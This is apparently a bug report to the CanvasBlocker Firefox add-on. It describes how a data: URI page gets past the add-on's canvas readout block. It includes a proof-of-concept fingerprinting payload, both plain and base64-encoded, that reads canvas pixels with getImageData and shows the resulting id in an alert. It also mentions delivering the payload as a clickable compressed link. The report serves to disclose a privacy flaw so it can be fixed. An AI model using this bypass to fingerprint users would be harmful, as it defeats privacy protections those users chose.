Data URI scheme bypasses the readout API block

Description

Using a Data URI scheme instead a classic HTML/JS bypasses the readout API block

Expected Behavior

The readout API block, if set in the add-on configuration, should work in any circumstance.

Current Behavior

Despite the readout API block set in the add-on configuration a Data URI scheme can execute code able to readout (and write) from Canvas.

Steps to Reproduce (for bugs)

paste this simple fingerprinting code (not very fingerprinting, it’s just a concept), in the browser URL bar and it will popoup your fingerprinted id:

data:text/html,<html><head><script>window.onload=showId;function showId(){var CanvaS,ctxS,ciS,S,W,H;var e=0.0;var C=document.createElement("canvas");C.width=400;C.height=400;C.id="canvasS";document.body.appendChild(C);CanvaS=document.getElementById("canvasS");ctxS=CanvaS.getContext("2d");W=CanvaS.width;H=CanvaS.height;ctxS.textBaseline="top";ctxS.font="1.01emOptimer,verdana";ctxS.fillStyle="rgba(255,255,255,1)";ctxS.fillText("Test",0,0);ciS=ctxS.getImageData(0,0,W,H);S=ciS.data;for(var x=0;x<W*H*4;x++){e=e+S[x]*x;}alert("id:"+e);}</script></head></html>

it uses getImageData to elaborate how the text ‘Test’ is rendered

Context

I did some research and it seems that Firefox (as well as other browser) now limits the ways Data URI scheme can be used. I tried to use as iframe, as link, as pop-up window and as image source with no success (luckily). I tried even to use the base64 encoded version (to avoid problems with escaping characters and such):

data:text/html;base64,PGh0bWw+PGhlYWQ+PHNjcmlwdD53aW5kb3cub25sb2FkPXNob3dJZDtmdW5jdGlvbiBzaG93SWQoKXt2YXIgQ2FudmFTLGN0eFMsY2lTLFMsVyxIO3ZhciBlPTAuMDt2YXIgQz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJjYW52YXMiKTtDLndpZHRoPTQwMDtDLmhlaWdodD00MDA7Qy5pZD0iY2FudmFzUyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChDKTtDYW52YVM9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNhbnZhc1MiKTtjdHhTPUNhbnZhUy5nZXRDb250ZXh0KCIyZCIpO1c9Q2FudmFTLndpZHRoO0g9Q2FudmFTLmhlaWdodDtjdHhTLnRleHRCYXNlbGluZT0idG9wIjtjdHhTLmZvbnQ9IjEuMDFlbU9wdGltZXIsdmVyZGFuYSI7Y3R4Uy5maWxsU3R5bGU9InJnYmEoMjU1LDI1NSwyNTUsMSkiO2N0eFMuZmlsbFRleHQoIlRlc3QiLDAsMCk7Y2lTPWN0eFMuZ2V0SW1hZ2VEYXRhKDAsMCxXLEgpO1M9Y2lTLmRhdGE7Zm9yKHZhciB4PTA7eDxXKkgqNDt4Kyspe2U9ZStTW3hdKng7fWFsZXJ0KCJpZDoiK2UpO308L3NjcmlwdD48L2hlYWQ+PC9odG1sPg==

It still works manually pasting it on the URL bar, but it does not work in any other way i tested.

But here the problem: at the end I’ve tested the code in combination with a service that compresses the HTML/JS code and then decompresses it in real time in data:text (the service is https://itty.bitty.site). And here the final exploit:

maliciuos link that can bypass readout blocking

Your Environment

• CanvasBlocker Version used: 0.4.5c
• Firefox version: 61.0.1 (64-bit)
• Operating System and version (desktop): Windows 7 ultimate 64-bit

Your Settings

{ “logLevel”: 1, “urlSettings”: [], “whiteList”: “”, “blackList”: “”, “blockMode”: “blockReadout”, “minFakeSize”: 1, “maxFakeSize”: 0, “rng”: “nonPersistent”, “apiWhiteList”: {}, “useCanvasCache”: true, “ignoreFrequentColors”: 0, “minColors”: 0, “fakeAlphaChannel”: false, “persistentRndStorage”: “”, “storePersistentRnd”: false, “persistentRndClearIntervalValue”: 0, “persistentRndClearIntervalUnit”: “days”, “lastPersistentRndClearing”: 0, “askOnlyOnce”: “individual”, “askDenyMode”: “block”, “showCanvasWhileAsking”: true, “showNotifications”: true, “storeImageForInspection”: false, “notificationDisplayTime”: 30, “ignoreList”: “”, “showCallingFile”: false, “showCompleteCallingStack”: false, “enableStackList”: false, “stackList”: “”, “displayAdvancedSettings”: true, “displayDescriptions”: false, “isStillDefault”: false, “storageVersion”: 0.3 }